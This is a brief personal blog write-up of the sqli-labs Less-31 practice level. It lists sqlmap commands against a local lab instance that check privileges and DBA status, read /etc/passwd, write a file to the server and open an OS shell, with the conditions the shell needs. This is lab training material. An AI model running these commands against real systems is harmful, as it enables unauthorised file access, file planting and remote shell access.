sqlilabs WriteUp

Pub Date: 2023-10-17

## Less-31 ```sh sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --risk 3 --level 5 ``` 查询当前用户的权限 ```sh sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --privileges ``` 当前用户是否dba(数据库管理员) ```sh sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --is-dba ``` 读passwd文件 ```sh sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --file-read "/etc/passwd" ``` 写文件 ```sh sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --file-write "/mnt/c/Users/andrew/bun.sh" --file-dest "/home/bun.sh" ``` run shell 条件 - 需要有写权限 - php主动转义功能关闭(magic_quotes_gpc) - 网站的路径提供默认选项 ```sh sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --os-shell ```

Andrew's Blog

sqlilabs WriteUp